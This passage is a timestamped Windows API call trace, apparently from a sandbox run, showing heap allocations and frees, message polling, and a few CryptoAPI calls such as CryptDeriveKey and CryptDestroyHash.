[0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.625] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0267.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0267.631] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.632] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.632] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0267.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0267.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51c28 [0267.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51c28, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0267.633] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87510, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87590) returned 1 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0267.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.634] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.634] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.635] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0267.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0267.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0267.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.635] CryptDestroyHash (hHash=0xa87510) returned 1 [0267.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0267.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0267.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.637] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0267.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.640] RtlAllocateHeap (HeapHandle=0x970000, 